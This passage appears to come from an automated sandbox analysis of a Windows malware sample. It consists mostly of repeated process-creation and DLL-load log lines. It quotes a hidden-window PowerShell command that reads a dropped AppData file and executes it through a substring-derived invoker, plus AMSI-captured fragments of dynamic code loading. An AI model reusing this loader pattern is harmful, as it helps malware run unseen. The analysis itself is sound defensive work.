Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exeSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exeSection loaded: riched20.dllJump to behavior
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exeSection loaded: usp10.dllJump to behavior
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exeSection loaded: msls31.dllJump to behavior
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: Ej86aa7Ki7.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

barindex
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Fermal $Ruteflyenes $Oestrum), (Niendedelens178 @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Tightfisted = [AppDomain]::CurrentDomain.GetAssemblies()$gl
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Nvnt)), $Tackies).DefineDynamicModule($Sidse, $false).DefineType($Dkvinget, $ren, [System.MulticastDelegate])$Borgenes.DefineConstruct
Suspicious powershell command line found
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Fysioterapiens=gc -raw 'C:\Users\user\AppData\Roaming\afdragsordning\Taarnvognenes.Ufe';$Blinn=$Fysioterapiens.SubString(29179,3);.$Blinn($Fysioterapiens)
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Fysioterapiens=gc -raw 'C:\Users\user\AppData\Roaming\afdragsordning\Taarnvognenes.Ufe';$Blinn=$Fysioterapiens.SubString(29179,3);.$Blinn($Fysioterapiens)Jump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
